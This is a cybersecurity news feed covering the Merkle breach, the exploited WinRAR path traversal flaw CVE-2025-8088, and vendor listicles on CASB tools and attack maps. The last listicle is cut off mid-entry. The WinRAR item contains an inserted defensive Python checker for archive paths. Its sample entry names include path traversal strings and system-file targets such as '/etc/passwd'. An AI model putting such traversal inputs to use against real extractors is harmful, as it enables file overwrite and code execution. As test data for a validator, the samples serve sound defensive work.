Cyberattack News (https://cybersecuritynews.com/category/cyber-attack/), World's #1 Premier Cybersecurity and Hacking News Portal, feed updated Thu, 30 Oct 2025 08:42:33 +0000

Dentsu has Disclosed that its U.S.-based Subsidiary Merkle Suffers Cyberattack
https://cybersecuritynews.com/dentsu-merkle-suffers-cyberattack/
Thu, 30 Oct 2025 08:42:28 +0000
Global advertising and marketing giant Dentsu has confirmed that its U.S.-based subsidiary Merkle experienced a cyberattack, prompting immediate incident response measures and system shutdowns to contain the breach.

The company detected abnormal activity within Merkle’s network infrastructure, which led to proactive security protocols being deployed to minimize operational impact.

Merkle, recognized as a leader in Customer Experience Management for Dentsu’s international operations, was targeted in the cyber incident that affected portions of its network systems.

Upon discovering the suspicious activity, Dentsu’s security teams immediately activated incident response procedures and made the strategic decision to shut down certain systems as a precautionary measure.

Investigation and Regulatory Compliance

The incident underscores the growing threat landscape facing major marketing and customer data management firms that handle sensitive client information across multiple industries.

Merkle serves numerous Fortune 500 companies and manages vast amounts of customer data, making it an attractive target for cybercriminals seeking valuable corporate and consumer information.

Dentsu has engaged an external cybersecurity firm with extensive experience handling similar breach investigations to assist with forensic analysis and remediation efforts.

The company emphasized its commitment to transparency by reporting the incident to relevant authorities in compliance with data protection regulations across different jurisdictions where it operates.

The ongoing investigation aims to determine the full extent of the breach, including what data may have been accessed or compromised, the attack vector used by threat actors, and whether any client information was exposed.

As organizations increasingly face sophisticated cyber threats, rapid detection and response have become critical components of enterprise security strategies. Dentsu has clarified that the cyberattack was isolated to Merkle’s U.S. operations and did not impact the company’s network systems in Japan.

This geographic containment suggests that Dentsu maintains segmented network infrastructure across its global operations, which helped prevent the incident from spreading to other regional divisions. However, the company acknowledged that financial repercussions are anticipated as a result of the breach.

Dentsu stated it is continuing to assess both the magnitude and timeline of the expected financial impact, which could include incident response costs, potential regulatory fines, customer notification expenses, and possible remediation investments to strengthen security controls.

The disclosure comes amid heightened scrutiny of cybersecurity practices across the marketing technology sector, where companies process massive volumes of consumer data for targeted advertising and personalized customer experiences.

As investigations continue, Dentsu remains focused on restoring full operational capabilities while implementing enhanced security measures to prevent future incidents.

CISA Added WinRAR Zero-Day (CVE-2025-8088) Vulnerability That is Actively Exploited In the Wild
https://cybersecuritynews.com/cisa-added-winrar-zero-day-vulnerability/
Wed, 13 Aug 2025 20:30:26 +0000
The U.S. Cybersecurity and Infrastructure Security Agency has added this vulnerability to its Known Exploited Vulnerabilities catalog, with a due date of September 2, 2025, for federal agencies to apply mitigations.

WinRAR has released version 7.13 to address a critical security vulnerability that has been actively exploited by cybercriminals, marking another significant security incident for the popular file compression software.

The vulnerability, designated CVE-2025-8088, allows attackers to execute arbitrary code through maliciously crafted archive files, prompting immediate action from users worldwide.

Critical Security Flaw Exploited by Russian Hackers

The newly discovered vulnerability represents a serious threat to Windows users, with security researchers confirming that it has been exploited in active campaigns.

CVE-2025-8088 is a path traversal vulnerability that affects the Windows versions of WinRAR, UnRAR, and associated components, allowing specially crafted archives to bypass user-specified extraction paths and write files to unintended locations on the file system.

This capability enables attackers to execute arbitrary code on compromised systems, making it a particularly dangerous security flaw.

ESET researchers have linked this vulnerability to exploitation by the Russian RomCom group, which has been targeting companies across Europe and Canada.

The cybersecurity firm’s research team, including Anton Cherepanov, Peter Košinár, and Peter Strýček, discovered the vulnerability and reported it to WinRAR developers.

The vulnerability has been assigned a CVSS score of 8.4, classifying it as HIGH severity, which underscores the critical nature of this security issue.

Technical Details and Affected Systems

The directory traversal vulnerability is distinct from a previously patched security flaw that was addressed in WinRAR version 7.12, indicating that this represents a new attack vector that required separate remediation. The affected systems include:

  • WinRAR for Windows – All desktop installations of the primary software.
  • RAR and UnRAR command-line utilities – Windows versions of these tools.
  • UnRAR.dll and portable UnRAR – Dynamic library and standalone versions.
  • Version range affected – All WinRAR versions from 0 through 7.12.
  • Unaffected platforms – Linux/Unix builds and RAR for Android remain secure.

The vulnerability affects all WinRAR versions from 0 through 7.12, meaning that virtually all existing installations require immediate updating.

The path traversal mechanism allows malicious archives to escape their intended extraction directories, potentially overwriting system files or placing executable code in locations where it can be automatically executed by the operating system.

This type of attack can lead to complete system compromise, data theft, or deployment of additional malware payloads.
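As an added illustration (not code from the original article, from WinRAR, or from ESET), the following Python shows the containment check an archive extractor needs so that an entry name cannot escape the destination directory the user chose. The entry names and destination paths are constructed samples, and resolve_entry and check_entries are hypothetical helper names. It goes slightly beyond the article's description by also rejecting absolute and drive-letter entry names and by treating backslash and forward-slash separators alike, as a Windows extractor must.

```python
import posixpath
import re
from typing import List, Optional, Tuple

# Drive-letter prefix such as "C:"; archives built on Windows may carry such names
_DRIVE_PREFIX = re.compile(r"^[A-Za-z]:")


def _to_posix(path: str) -> str:
    """Treat backslashes as separators; Windows extractors accept both forms."""
    return path.replace("\\", "/")


def resolve_entry(dest_root: str, entry_name: str) -> Optional[str]:
    """Return the target path for an archive entry, or None when the entry would
    land outside dest_root (absolute name, drive letter, or '..' segments that
    climb above the destination). Hypothetical helper, not WinRAR's own logic."""
    root = posixpath.normpath(_to_posix(dest_root))
    name = _to_posix(entry_name)
    if _DRIVE_PREFIX.match(name) or name.startswith("/"):
        return None  # absolute target: never honoured, whatever the archive says
    target = posixpath.normpath(posixpath.join(root, name))
    # Lexical containment: target must be root itself or strictly below it.
    # The trailing "/" stops a sibling directory such as root + "2" from passing.
    if target != root and not target.startswith(root.rstrip("/") + "/"):
        return None
    return target


def check_entries(dest_root: str, entry_names: List[str]) -> List[Tuple[str, Optional[str]]]:
    """Classify every entry; a None target means the extractor must skip it."""
    return [(name, resolve_entry(dest_root, name)) for name in entry_names]


# Constructed sample entry names: three benign, five that try to escape
SAMPLE_ENTRIES = [
    "report.pdf",
    "docs\\notes.txt",
    "docs/../report2.pdf",
    "../../outside.exe",
    "..\\..\\outside.exe",
    "/etc/passwd",
    "C:\\Windows\\win.ini",
    "../extract2/x",
]


if __name__ == "__main__":
    dest = "C:\\Users\\alice\\Downloads\\extract"  # constructed destination
    for name, target in check_entries(dest, SAMPLE_ENTRIES):
        verdict = "OK  " if target else "SKIP"
        print(f"{verdict} {name!r} -> {target}")
```

The check is purely lexical. Because the article notes that WinRAR can preserve symbolic links, an extractor that honours links already written inside the destination also needs a second check on the resolved (realpath) location of each target before writing, otherwise a link entry followed by a file entry through it defeats the name-based test.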

Immediate Action Required for Users

WinRAR users must immediately update to version 7.13, which was released on July 30, 2025, with updated release notes published on August 12, 2025.

The update addresses not only the critical security vulnerability but also fixes several bugs from the previous version, including issues with the “Import settings from file” command and recovery size settings for older compression profiles.

The urgency of this update cannot be overstated, particularly given the confirmed exploitation in the wild. Organizations and individual users should prioritize this update across all Windows systems running WinRAR.

Beyond the immediate security fix, WinRAR 7.13 continues to offer advanced NTFS features that distinguish it from other compression tools, including built-in options to preserve symbolic links and archive Alternate Data Streams (ADS).

These capabilities remain valuable for backup, deployment, and forensic environments, but users must ensure they are running the latest secure version to benefit from these features safely.

Users who cannot immediately update should consider discontinuing use of WinRAR until the update can be applied, particularly in environments where untrusted archive files are regularly processed.

11 Best Cloud Access Security Broker Software (CASB) – 2025
https://cybersecuritynews.com/cloud-access-security-broker/
Mon, 14 Jul 2025 07:37:28 +0000
As organizations accelerate digital transformation, the need for robust cloud security has never been greater.

Cloud Access Security Broker (CASB) software stands at the forefront, acting as the critical gatekeeper between users and cloud service providers.

With the explosion of SaaS, IaaS, and PaaS platforms, businesses face evolving threats, compliance challenges, and the risk of data leakage.

CASB solutions empower IT teams to enforce security policies, monitor cloud usage, and ensure regulatory compliance, all while enabling agility and productivity.

Choosing the right CASB tool is essential for protecting sensitive data, managing shadow IT, and maintaining visibility across multi-cloud environments.

This comprehensive guide reviews the 11 best CASB software solutions for 2025, comparing their specifications, features, and value for organizations of all sizes.

Whether you’re a security leader at a global enterprise or an IT manager at a growing business, this article will help you make an informed decision and strengthen your cloud security posture.

CASB Comparison Table

Tool Name | Data Loss Prevention | Shadow IT Discovery | Threat Protection | Compliance Management | Multi-Cloud Support
Netskope | Yes | Yes | Yes | Yes | Yes
McAfee Skyhigh Security | Yes | Yes | Yes | Yes | Yes
Zscaler CASB | Yes | Yes | Yes | Yes | Yes
Microsoft Defender for Cloud Apps | Yes | Yes | Yes | Yes | Yes
Cisco Cloudlock | Yes | Yes | Yes | Yes | Yes
Symantec CloudSOC (Broadcom) | Yes | Yes | Yes | Yes | Yes
Forcepoint CASB | Yes | Yes | Yes | Yes | Yes
Lookout CASB | Yes | Yes | Yes | Yes | Yes
Palo Alto Networks Prisma Access | Yes | Yes | Yes | Yes | Yes
Proofpoint CASB | Yes | Yes | Yes | Yes | Yes
Censornet CASB | Yes | Yes | Yes | Yes | Yes

1. Netskope

Netskope is widely recognized as a leader in cloud security, offering a comprehensive CASB solution that delivers deep visibility, advanced threat protection, and granular policy enforcement.

Its cloud-native architecture is designed for modern enterprises, supporting hybrid and multi-cloud environments.

Netskope enables organizations to discover and control both sanctioned and unsanctioned cloud apps, mitigate data loss risks, and ensure regulatory compliance with ease.

With its intuitive dashboard and robust analytics, security teams gain actionable insights into user activity and cloud usage patterns.

Netskope’s advanced DLP, threat intelligence, and contextual access controls make it a top choice for organizations prioritizing secure digital transformation.

Its seamless integration with existing security stacks and support for BYOD policies further enhance its value for distributed workforces.

Specifications

  • Deployment: Cloud-native, API and proxy-based
  • Supported Environments: SaaS, IaaS, PaaS
  • Integration: SIEM, EDR, IAM, SWG
  • Reporting: Real-time analytics, customizable dashboards

Reason to Buy

  • Industry-leading visibility into cloud usage and threats
  • Advanced DLP and threat protection capabilities
  • Flexible deployment for hybrid and multi-cloud environments
  • Strong compliance and policy enforcement tools

Features

  • Shadow IT discovery and risk assessment
  • Contextual access controls and encryption
  • Real-time threat detection powered by AI
  • Automated compliance reporting

✅ Best For: Enterprises needing deep cloud visibility and advanced threat protection

🔗 Try Netskope here → Netskope Official Website

2. McAfee Skyhigh Security CASB

McAfee Skyhigh Security (formerly MVISION Cloud) delivers a robust CASB platform tailored for organizations with complex cloud environments.

The solution offers comprehensive protection for data across SaaS, IaaS, and PaaS platforms, leveraging global threat intelligence and advanced analytics.

Skyhigh Security excels in policy customization, enabling granular control over data access, sharing, and storage.

Its seamless integration with other security tools and regulatory frameworks makes it ideal for heavily regulated industries.

The platform’s intuitive interface and strong support for compliance standards such as GDPR, HIPAA, and PCI DSS ensure organizations can confidently manage cloud risk.

Specifications

  • Deployment: Cloud-based, API-first architecture
  • Supported Environments: SaaS, IaaS, PaaS
  • Compliance: Pre-built policy templates for major regulations
  • Analytics: Global threat intelligence, activity monitoring

Reason to Buy

  • Comprehensive data protection across all major cloud services
  • Strong policy customization and enforcement
  • Integrated compliance management
  • Global threat intelligence for proactive defense

Features

  • Real-time activity monitoring and anomaly detection
  • Automated policy enforcement and incident response
  • Data classification and encryption
  • Extensive third-party integrations

✅ Best For: Organizations in regulated industries seeking comprehensive cloud security

🔗 Try McAfee Skyhigh Security here → McAfee Skyhigh Security Official Website

3. Zscaler CASB

Zscaler CASB is designed for simplicity, scalability, and robust security. As part of the Zscaler Zero Trust Exchange, it provides multimode protection for cloud data in motion and at rest.

Zscaler’s inline and API-based architecture enables real-time inspection, DLP, and threat prevention without compromising user experience.

The platform’s advanced analytics, automated policy management, and seamless integration with Zscaler’s broader security suite make it a strong choice for organizations moving towards zero trust architectures.

Zscaler CASB’s ability to discover shadow IT and enforce granular policies helps businesses reduce risk and maintain compliance.

Specifications

  • Deployment: Inline proxy and API-based
  • Supported Environments: SaaS, IaaS
  • Policy Management: Automated, centralized
  • Analytics: Real-time, customizable reports

Reason to Buy

  • Real-time, inline protection for cloud data
  • Seamless integration with zero trust architectures
  • Automated discovery and control of shadow IT
  • Scalable for large, distributed organizations

Features

  • SSL inspection and advanced DLP
  • Threat protection with cloud sandboxing
  • API-based scanning of SaaS apps
  • Collaboration management and risk assessment

✅ Best For: Organizations adopting zero trust and needing scalable cloud security

🔗 Try Zscaler CASB here → Zscaler Official Website

4. Microsoft Defender For Cloud Apps

Microsoft Defender for Cloud Apps offers deep integration with Microsoft 365 and Azure, making it a natural fit for organizations heavily invested in the Microsoft ecosystem.

The CASB solution provides rich visibility, control, and analytics for cloud app usage, enabling IT teams to detect threats, enforce policies, and protect sensitive data.

Its user-friendly interface and strong automation capabilities simplify compliance and threat response.

Defender for Cloud Apps supports a wide range of third-party cloud services, ensuring comprehensive coverage for hybrid and multi-cloud environments.

Specifications

  • Deployment: Cloud-native, API-based
  • Supported Environments: Microsoft 365, Azure, third-party SaaS
  • Integration: SIEM, Microsoft security stack
  • Automation: Policy enforcement, incident response

Reason to Buy

  • Seamless integration with Microsoft cloud services
  • Automated threat detection and response
  • Comprehensive compliance and reporting tools
  • Extensive third-party app coverage

Features

  • Real-time monitoring and risk assessment
  • Automated policy enforcement
  • DLP and information protection
  • User and entity behavior analytics

✅ Best For: Microsoft-centric organizations seeking integrated cloud security

🔗 Try Microsoft Defender for Cloud Apps here → Microsoft Defender for Cloud Apps Official Website

5. Cisco Cloudlock

Cisco Cloudlock offers a cloud-native CASB platform focused on simplicity, scalability, and rapid deployment.

It enables organizations to monitor cloud app usage, enforce security policies, and protect sensitive data across SaaS, PaaS, and IaaS environments.

Cloudlock’s API-based architecture ensures minimal impact on user experience while delivering powerful threat detection and compliance management.

The platform’s intuitive interface and flexible policy engine make it easy for IT teams to manage cloud risks and respond to incidents quickly.

Cisco Cloudlock is particularly well-suited for organizations seeking a straightforward, effective CASB solution.

Specifications

  • Deployment: API-based, cloud-native
  • Supported Environments: SaaS, IaaS, PaaS
  • Integration: Cisco security suite, third-party tools
  • Reporting: Real-time dashboards, audit logs

Reason to Buy

  • Rapid deployment with minimal disruption
  • Strong compliance and data protection features
  • Flexible, easy-to-use policy management
  • Scalable for growing organizations

Features

  • Shadow IT discovery and control
  • Automated threat detection and response
  • DLP and encryption capabilities
  • Integration with Cisco security products

✅ Best For: Organizations seeking fast, scalable, and simple cloud security

🔗 Try Cisco Cloudlock here → Cisco Cloudlock Official Website

6. Symantec CloudSOC (Broadcom)

Symantec CloudSOC by Broadcom is a powerful CASB solution designed for enterprises with advanced compliance and security requirements.

It combines deep visibility, robust DLP, and real-time threat protection to safeguard cloud data and applications.

CloudSOC’s integration with Symantec’s DLP and threat intelligence platforms enhances its ability to detect and respond to sophisticated attacks.

The platform supports extensive compliance frameworks and offers detailed reporting, making it ideal for organizations in highly regulated sectors.

Its flexible deployment options and strong analytics capabilities provide comprehensive control over cloud environments.

Specifications

  • Deployment: Cloud-based, hybrid options
  • Supported Environments: SaaS, IaaS, PaaS
  • Compliance: Extensive frameworks supported
  • Analytics: Advanced threat and user behavior analytics

Reason to Buy

  • Deep integration with Symantec’s security suite
  • Advanced DLP and threat intelligence
  • Extensive compliance support
  • Flexible deployment for diverse environments

Features

  • Real-time threat detection and response
  • Automated compliance reporting
  • Shadow IT discovery and risk assessment
  • Data encryption and access controls

✅ Best For: Enterprises with complex compliance and security needs

🔗 Try Symantec CloudSOC here → Symantec CloudSOC Official Website

7. Forcepoint CASB

Forcepoint CASB delivers robust cloud security with a focus on behavior analytics and real-time threat detection.

Its integration with Forcepoint’s DLP and risk analysis engines enables organizations to protect sensitive data and monitor user activity across cloud applications.

Forcepoint’s UEBA (User and Entity Behavior Analytics) helps identify anomalous behavior and prevent insider threats.

The platform’s flexible deployment and strong reporting capabilities make it suitable for organizations seeking proactive cloud risk management.

Forcepoint CASB is particularly effective for businesses prioritizing data-centric security and user behavior monitoring.

Specifications

  • Deployment: Cloud-based, API and proxy options
  • Supported Environments: SaaS, IaaS
  • Analytics: UEBA, real-time monitoring
  • Integration: Forcepoint DLP, third-party tools

Reason to Buy

  • Advanced behavior analytics for insider threat detection
  • Strong DLP and risk analysis capabilities
  • Flexible deployment options
  • Comprehensive reporting and compliance tools

Features

  • Real-time activity monitoring and alerts
  • Automated policy enforcement
  • Data encryption and access management
  • Integration with Forcepoint security suite

✅ Best For: Organizations focusing on behavior analytics and insider threat prevention

🔗 Try Forcepoint CASB here → Forcepoint Official Website

8. Lookout CASB

Lookout CASB offers a flexible and comprehensive solution for securing data across cloud and on-premises environments.

Its platform provides complete control over access management, advanced data security, and proactive vulnerability detection.

Lookout’s intuitive interface and efficient access controls enable organizations to protect data regardless of endpoint or location.

The solution’s advanced search capabilities and self-remediation options empower users to address security issues quickly, reducing the burden on IT teams.

Lookout CASB is ideal for businesses seeking a user-friendly, highly configurable cloud security platform.

Specifications

  • Deployment: Cloud-native, API-based
  • Supported Environments: SaaS, IaaS, on-premises
  • Access Control: Granular, context-aware
  • Analytics: Advanced search, vulnerability detection

Reason to Buy

  • Flexible access management for diverse environments
  • Proactive vulnerability detection and alerts
  • User-friendly interface and self-remediation
  • Comprehensive data protection features

Features

  • Real-time monitoring and access control
  • Advanced data searching and classification
  • Automated policy enforcement
  • Integration with security and compliance tools

✅ Best For: Organizations needing flexible, user-friendly cloud security

🔗 Try Lookout CASB here → Lookout Official Website

9. Palo Alto Networks Prisma Access

Palo Alto Networks Prisma Access delivers a unified security platform that includes advanced CASB capabilities.

Its cloud-delivered architecture provides consistent protection across all users, applications, and devices, regardless of location.

Prisma Access integrates seamlessly with Palo Alto’s broader security ecosystem, offering robust threat prevention, DLP, and compliance management.

The platform’s AI-powered analytics and automated policy enforcement make it easy to manage cloud risks and maintain compliance.

Prisma Access is well-suited for organizations seeking a comprehensive, scalable solution for securing cloud and remote workforces.

Specifications

  • Deployment: Cloud-delivered, unified platform
  • Supported Environments: SaaS, IaaS, PaaS
  • Analytics: AI-powered, real-time
  • Integration: Palo Alto security suite, third-party tools

Reason to Buy

  • Unified security for cloud and remote users
  • AI-driven threat detection and policy automation
  • Seamless integration with existing security tools
  • Scalable for large, distributed organizations

Features

  • Real-time monitoring and DLP
  • Automated threat prevention and response
  • Compliance management and reporting
  • Centralized policy enforcement

✅ Best For: Large organizations needing unified cloud and remote security

🔗 Try Prisma Access here → Palo Alto Networks Prisma Access Official Website

10. Proofpoint CASB

Proofpoint CASB is designed to protect cloud applications from advanced threats and data loss.

Its solution offers granular visibility into cloud usage, automated policy enforcement, and robust threat intelligence.

Proofpoint’s integration with email security and DLP platforms enhances its ability to detect and respond to sophisticated attacks.

The platform’s user-centric approach and advanced analytics make it easy for organizations to identify risky behaviors and enforce security policies.

Proofpoint CASB is ideal for businesses seeking comprehensive protection against cloud-borne threats.

Specifications

  • Deployment: Cloud-based, API-first
  • Supported Environments: SaaS, IaaS
  • Analytics: User-centric, advanced threat intelligence
  • Integration: Proofpoint security suite, third-party tools

Reason to Buy

  • Granular visibility and control over cloud usage
  • Automated policy enforcement and threat response
  • Integration with email and DLP security
  • Advanced analytics for risk identification

Features

  • Real-time monitoring and alerts
  • DLP and encryption capabilities
  • Automated compliance reporting
  • Integration with security and compliance tools

✅ Best For: Organizations prioritizing advanced threat and data loss protection

🔗 Try Proofpoint CASB here → Proofpoint Official Website

11. Censornet CASB

Censornet CASB is part of the Censornet Autonomous Security Engine, offering integrated cloud security with adaptive multi-factor authentication, email security, and web security.

Its CASB component provides extensive reporting, secure user authentication, and real-time monitoring of cloud app usage.

Censornet’s pre-built trend reports and flexible policy engine enable organizations to manage cloud risks effectively.

The platform’s user-friendly interface and adaptive security features make it suitable for businesses seeking integrated, automated cloud protection.

Specifications

  • Deployment: Cloud-based, integrated with Censornet ASE
  • Supported Environments: SaaS, IaaS
  • Reporting: Pre-built trend reports, customizable views
  • Authentication: Adaptive MFA, IDaaS

Reason to Buy

  • Integrated security across cloud, email, and web
  • Extensive reporting and analytics
  • Adaptive authentication and access control
  • Automated policy enforcement

Features

  • Real-time monitoring and alerts
  • Automated compliance reporting
  • User and device risk assessment
  • Integration with Censornet security suite

✅ Best For: Businesses seeking integrated, automated cloud security

🔗 Try Censornet CASB here → Censornet Official Website

Conclusion

Selecting the right Cloud Access Security Broker software is crucial for safeguarding your organization’s data, ensuring compliance, and enabling secure cloud adoption.

Each CASB solution reviewed here offers unique strengths, from advanced threat detection and behavior analytics to seamless integration with existing security stacks.

Whether your priority is regulatory compliance, insider threat prevention, or unified cloud security, there’s a CASB tool tailored to your needs.

As cloud environments become more complex, investing in a leading CASB solution will help your business stay resilient against evolving threats, maintain visibility and control, and support secure digital transformation.

Use this guide as your roadmap to evaluate, compare, and deploy the best CASB software for your organization in 2025.

Top 10 Cyber Attack Maps to See Digital Threats In 2025
https://cybersecuritynews.com/cyber-attack-maps/
Mon, 14 Jul 2025 07:20:24 +0000
In 2025, the digital threat landscape is more dynamic and complex than ever. Cyber attacks are escalating in frequency, sophistication, and impact, targeting businesses, governments, and individuals worldwide.

Real-time visibility into these threats is essential for proactive defense, strategic planning, and rapid incident response.

Cyber attack maps have become indispensable tools for cybersecurity professionals and organizations.

These interactive platforms provide live visualizations of global cyber threats, helping users monitor attack patterns, assess risks, and stay ahead of emerging dangers.

Whether you’re a security analyst, IT manager, or simply interested in cyber trends, understanding the best cyber attack maps can empower your digital defense strategy.

This comprehensive guide reviews the Top 10 Cyber Attack Maps to See Digital Threats in 2025, comparing their features, specifications, and unique advantages.

We’ll help you discover which map best fits your needs, with clear reasons to buy, detailed features, and direct links to try each tool.

Comparison Table: Top 10 Cyber Attack Maps 2025

Tool Name | Real-Time Data | Attack Types | Customization | Free Access
Kaspersky Cyberthreat Map | Yes | Multiple | Yes | Yes
Fortinet Threat Map | Yes | Multiple | Yes | Yes
Check Point ThreatCloud Map | Yes | Multiple | Yes | Yes
Norse Attack Map | Yes | Multiple | No | Yes
FireEye Threat Map | Yes | Multiple | No | Yes
Akamai Real-Time Web Attack Monitor | Yes | Web Attacks | Limited | Yes
Digital Attack Map | Yes | DDoS | Yes | Yes
Bitdefender Threat Map | Yes | Multiple | No | Yes
SonicWall Live Cyber Attack Map | Yes | Multiple | Yes | Yes
Imperva Live Threat Map | Yes | Multiple | No | Yes

1. Kaspersky Cyberthreat Map

Kaspersky’s Cyberthreat Map is a visually stunning platform that displays real-time cyber threats from around the world.

The map aggregates data from multiple sources, including on-access and on-demand scans, mail and web anti-virus, intrusion detection, and botnet activity.

Users can rotate and zoom on specific countries to view nation-specific data and historical trends.

Kaspersky’s interface is sleek, interactive, and informative, making it a favorite among security professionals and enthusiasts alike.

The map not only reveals ongoing attacks but also provides insights into the most infected countries and prevalent threat types.

Its rich data sources and intuitive controls make it an excellent choice for monitoring the global threat landscape or drilling down into local risks.

Specifications

  • Real-time visualization of global cyber threats
  • Multiple data sources (scans, botnet, anti-virus, etc.)
  • Country-specific details and statistics
  • Interactive globe view with zoom and rotation
  • Historical data and trends

Reason to Buy

  • Comprehensive real-time threat monitoring
  • User-friendly and visually engaging interface
  • Detailed breakdown by country and threat type
  • Trusted by cybersecurity professionals worldwide

Features

  • Multiple display modes and nation panels
  • Top threat types and infected regions
  • Customizable views for deeper insights
  • Option to embed the map on your website

✅ Best For: Real-time global threat awareness and detailed regional analysis

🔗 Try Kaspersky Cyberthreat Map here → Kaspersky Official Website

2. Fortinet Threat Map

Fortinet’s Threat Map delivers a real-time view of malicious network activity across the globe.

Leveraging data from Fortinet’s extensive network of security appliances, the map displays attack types, severity, and geographic locations.

Users can click on any country to see detailed statistics for incoming and outgoing attacks, providing a granular perspective on the threat environment.

The platform’s clean interface and ongoing statistics, such as botnet C&C attempts and malware programs per minute, make it a valuable resource for organizations seeking actionable intelligence on current threats.

Specifications

  • Live visualization of attack types and locations
  • Real-time statistics and activity logs
  • Country-level breakdowns
  • Integration with Fortinet’s security ecosystem

Reason to Buy

  • High-fidelity, real-time threat intelligence
  • Deep integration with Fortinet solutions
  • Country-specific analytics for targeted defense
  • Continuous updates from a global sensor network

Features

  • Detailed logs of attack types and severity
  • Customizable threat monitoring
  • Day/night map overlay
  • Ongoing botnet and malware statistics

✅ Best For: Organizations using Fortinet products or seeking granular attack analytics

🔗 Try Fortinet Threat Map here → Fortinet Official Website

3. Check Point ThreatCloud Map

Check Point’s ThreatCloud Map offers a daily-updated, real-time visualization of global cyber attacks.

The platform presents a clear chart of recent attacks, top targeted countries, and industries, along with the most-used malware types.

Its historical playback feature allows users to review past attack data for deeper analysis.

The map’s straightforward visuals and regularly refreshed data make it ideal for both quick overviews and in-depth threat investigations.

Specifications

  • Real-time and historical attack data
  • Daily updates and playback feature
  • Global and regional attack statistics
  • Malware type breakdowns

Reason to Buy

  • Trusted, up-to-date threat intelligence
  • Historical data for trend analysis
  • Simple, clean interface for rapid insights
  • Focus on top targeted sectors and regions

Features

  • Attack playback and daily charts
  • Customizable filters for attack types
  • Malware and target country statistics
  • Easy-to-understand data visualizations

✅ Best For: Security teams needing daily threat updates and historical analysis

🔗 Try Check Point ThreatCloud Map here → Check Point Official Website

4. Norse Attack Map

The Norse Attack Map is renowned for its mesmerizing real-time visualizations of cyber attacks.

This map detects your location and displays live stats for your country, including top local attacks and infection types.

The platform’s graphical interface is sleek and engaging, offering a dramatic view of ongoing cyber battles worldwide.

Although not the most feature-rich, Norse’s map is highly effective for raising awareness and illustrating the scale of global cyber threats.

Specifications

  • Real-time attack visualization
  • Geolocation of sources and targets
  • Attack types and targeted services
  • Sleek, interactive interface

Reason to Buy

  • Eye-catching, live cyber attack displays
  • Immediate awareness of global threats
  • Simple, intuitive user experience
  • Free and accessible to all users

Features

  • Country-specific stats and trends
  • Toggle map color and globe view
  • Demo mode for presentations
  • Helpful articles and a Buzz tab

✅ Best For: Visualizing attack patterns and public cybersecurity awareness

🔗 Try Norse Attack Map here → Norse Official Website

5. FireEye Threat Map

FireEye’s Threat Map provides a real-time summary of cyber attacks detected by its global network. The platform highlights the total number of daily attacks, top targeted industries, and leading attacker countries.

While it offers less granular detail than some competitors, FireEye’s map excels in presenting a quick, easy-to-read overview of the current threat landscape.

This tool is particularly useful for identifying advanced persistent threats and monitoring global attack campaigns.

Specifications

  • Real-time attack summaries
  • Daily attack totals and trends
  • Industry and country breakdowns
  • Data sourced from FireEye’s global network

Reason to Buy

  • Fast, accessible threat overview
  • Focus on advanced persistent threats
  • Industry-specific attack insights
  • Backed by FireEye’s threat intelligence

Features

  • Top attacker and target statistics
  • Simple, user-friendly interface
  • Daily updated data
  • Overview of global attack campaigns

✅ Best For: Quick threat overviews and industry-specific monitoring

🔗 Try FireEye Threat Map here → FireEye Official Website

6. Akamai Real-Time Web Attack Monitor

Akamai’s Real-Time Web Attack Monitor leverages its massive global network to visualize web-based attacks as they happen.

The map pinpoints sources and targets, displaying the most significant attack locations over the past 24 hours.

Users can choose different regions and languages, making it accessible to a global audience.

Akamai’s map is ideal for organizations concerned with web application security and large-scale DDoS attacks.

Specifications

  • Real-time web attack visualization
  • Global and regional filtering
  • Multi-language support
  • Data from Akamai’s CDN and security services

Reason to Buy

  • Extensive global attack coverage
  • Focus on web and DDoS threats
  • Regional and language customization
  • Backed by Akamai’s industry-leading infrastructure

Features

  • Top attack locations and trends
  • Adjustable dashboards and notifications
  • Learning resources and glossary
  • 24-hour attack history

✅ Best For: Monitoring web-based attacks and DDoS trends

🔗 Try Akamai Real-Time Web Attack Monitor here → Akamai Official Website

7. Digital Attack Map

The Digital Attack Map, created in collaboration with Arbor Networks and Google, specializes in visualizing global DDoS attacks.

The platform offers real-time data on attack intensity and frequency, with options to view historical trends and filter by size or type.

The map’s intuitive interface and focus on DDoS make it a go-to tool for organizations needing to track large-scale disruptions.

Although the tool’s maintenance status should be checked for 2025, it remains a valuable resource for DDoS situational awareness.

Specifications

  • Real-time DDoS attack visualization
  • Attack traffic intensity and location
  • Historical data and filtering options
  • Collaboration with Arbor Networks and Google

Reason to Buy

  • Focused insight into DDoS activity
  • Historical trends for incident analysis
  • Easy-to-use, interactive interface
  • Recognized by industry leaders

Features

  • Real-time and historical filtering
  • Attack size and type customization
  • Global and regional monitoring
  • Intuitive data visualizations

✅ Best For: DDoS threat monitoring and historical analysis

🔗 Try Digital Attack Map here → Digital Attack Map Official Website

8. Bitdefender Threat Map

Bitdefender’s Threat Map is an interactive platform that displays live attacks, infections, and spam worldwide.

The map provides real-time reports with details on attack type, time, and location, helping users identify emerging threats quickly.

Its clear visuals and up-to-date information make it a strong choice for anyone seeking a comprehensive view of global cyber risks.

Bitdefender’s focus on infections and spam adds an extra layer of intelligence for organizations facing diverse threat vectors.

Specifications

  • Live attack, infection, and spam data
  • Real-time reporting by type and location
  • Interactive, user-friendly interface
  • Global coverage

Reason to Buy

  • Comprehensive threat intelligence
  • Focus on infections and spam trends
  • Real-time updates for rapid response
  • Backed by Bitdefender’s research

Features

  • Attack and infection breakdowns
  • Global and regional views
  • Spam and malware tracking
  • Simple, interactive controls

✅ Best For: Organizations monitoring infections, spam, and malware

🔗 Try Bitdefender Threat Map here → Bitdefender Official Website

9. SonicWall Live Cyber Attack Map

SonicWall’s Live Cyber Attack Map offers a graphical view of attacks over the past 24 hours, including malware, ransomware, encrypted traffic, intrusion attempts, and spam/phishing.

The map highlights both the origin and target of each attack, providing actionable intelligence for security teams.

SonicWall’s platform is particularly valuable for organizations seeking to monitor a wide range of threat types in real time.

Specifications

  • 24-hour attack visualization
  • Multiple attack categories
  • Source and target mapping
  • Security news and research integration

Reason to Buy

  • Broad threat coverage (malware, ransomware, etc.)
  • Real-time and historical insights
  • Integration with SonicWall research
  • Easy-to-use graphical interface

Features

  • Attack site statistics
  • Security news updates
  • Multiple threat categories
  • Interactive global map

✅ Best For: Comprehensive, multi-threat monitoring

🔗 Try SonicWall Live Cyber Attack Map here → SonicWall Official Website

10. Imperva Live Threat Map

Imperva’s Live Threat Map provides a real-time global view of DDoS attacks, hacking attempts, and bot assaults.

The map is powered by Imperva’s security services, offering instant visibility into ongoing threats and their geographic spread.

Its clean interface and focus on actionable intelligence make it a practical tool for both security professionals and the general public.

